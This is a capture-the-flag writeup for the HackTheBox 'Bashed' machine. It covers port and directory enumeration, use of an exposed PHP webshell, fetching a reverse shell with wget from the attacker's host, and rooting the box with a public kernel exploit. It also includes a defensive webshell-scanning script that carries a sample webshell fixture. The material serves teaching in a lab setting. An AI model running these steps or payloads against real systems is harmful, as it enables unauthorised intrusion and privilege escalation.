writeup
HackTheBox
Bashed
Easy
kernel exploit
We can see that we only have a webserver up, so it's time to bruteforce subdirectories and look into the web.
# Nmap 7.92 scan initiated Mon Apr 18 11:35:37 2022 as: nmap -sV -T4 -sS -sC -v -p- -oN Ports 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.056s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 18 11:36:03 2022 -- 1 IP address (1 host up) scanned in 25.42 seconds
We use ffuf to bruteforce subdirectories on the live web server; remember to use different wordlists and fuzz more than once so that nothing is missed because of errors.
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.68/FUZZ -fc 404 -t 100 -e=php,txt
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.68/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : php txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________
uploads [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 44ms]
php [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 2791ms]
images [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 4812ms]
css [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 43ms]
[Status: 200, Size: 7743, Words: 2956, Lines: 162, Duration: 5837ms]
dev [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 43ms]
js [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 46ms]
fonts [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 42ms]
If we open the site in a browser we see this:
After enumerating, we can see that the site is about a PHP webshell, and in the /dev subdirectory we find these two webshells, the standard one and the one-line one:
After opening one of these we can start the exploitation.
Inside the webshell we see this:
We are running as the www-data user and can obtain the user flag simply by digging in the home directory.
It's time to upgrade the shell and look for a way to privesc.
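The root cause of the initial access here is a webshell left reachable in /dev. As an added defender-side example (not part of the original writeup), the following Python script walks a web root and flags PHP files that call shell-execution functions, rating those that also read request parameters as likely webshells; the web root layout and file names it builds are constructed for the demo.

```python
"""Flag PHP files in a web root that execute OS commands (webshell triage).
Added example for this writeup; paths and sample files below are constructed."""
import os
import re
import tempfile
from typing import Dict, List

# PHP functions that run OS commands. A hit combined with request-derived
# input is the usual signature of a webshell; a hit alone still needs review.
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
EXEC_RE = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.IGNORECASE)
INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
BACKTICK_RE = re.compile(r"`[^`\n]*\$[^`\n]*`")  # `...$var...` also spawns a shell


def classify_php(source: str) -> Dict[str, bool]:
    """Return which webshell indicators a PHP source text exhibits."""
    return {
        "exec_call": bool(EXEC_RE.search(source) or BACKTICK_RE.search(source)),
        "request_input": bool(INPUT_RE.search(source)),
    }


def scan_webroot(root: str) -> List[Dict[str, str]]:
    """Walk root; report PHP files with exec calls, 'high' if they also read request data."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                flags = classify_php(fh.read())
            if flags["exec_call"]:
                severity = "high" if flags["request_input"] else "review"
                findings.append({"path": os.path.relpath(path, root), "severity": severity})
    return sorted(findings, key=lambda f: f["path"])


def demo() -> List[Dict[str, str]]:
    """Build a constructed web root (dev/ shell, benign index, hard-coded cron) and scan it."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "dev"))
    os.makedirs(os.path.join(root, "uploads"))
    fixtures = {  # constructed fixtures, mirroring the kind of file found in /dev
        "dev/shell.php": "<?php if(isset($_REQUEST['cmd'])) echo shell_exec($_REQUEST['cmd']); ?>",
        "index.php": "<?php echo 'Development site'; ?>",
        "uploads/cron.php": "<?php system('ls -la /var/www/html/uploads'); ?>",
    }
    for rel, body in fixtures.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return scan_webroot(root)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['severity']:6} {finding['path']}")
```

Run it against the real document root (for example scan_webroot("/var/www/html")) after a deployment; any "high" finding outside code you recognise deserves immediate attention, and /dev style tooling should never be reachable from the internet.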
If we try to execute a PHP script or a netcat reverse shell back to our local machine it won't work, so we have to upload a reverse shell. In this case I use the pentestmonkey php-reverse-shell located in /usr/share/webshells/php/, and to upload it to the target machine we set up a local web server with Python.
python3 -m http.server 80
After that, inside the webshell, go to /uploads and download it with wget.
wget http://10.10.10.10/reverse.php
Start a netcat listener on the same port configured in the PHP reverse shell and load the page:
After that we receive the reverse shell in our terminal:
We upgrade the shell with Python:
python -c 'import pty; pty.spawn("/bin/bash")'
After that we should have a stable reverse shell as the user www-data; now it's time to privesc.
First, I upload a copy of linpeas.sh using the same method as above, downloading it from the GitHub repository.
https://github.com/carlospolop/PEASS-ng/releases/download/20220417/linpeas.sh
After running it we should see some recommended exploits; in my case I used the third one:
https://www.exploit-db.com/exploits/45010
You only have to download it on your machine, compile it and upload it to the target using the same HTTP server technique as before.
Then execute it and you should have a full root shell:
It's important to keep the system kernel updated to avoid easy and critical kernel exploits that let an attacker obtain full access without much effort.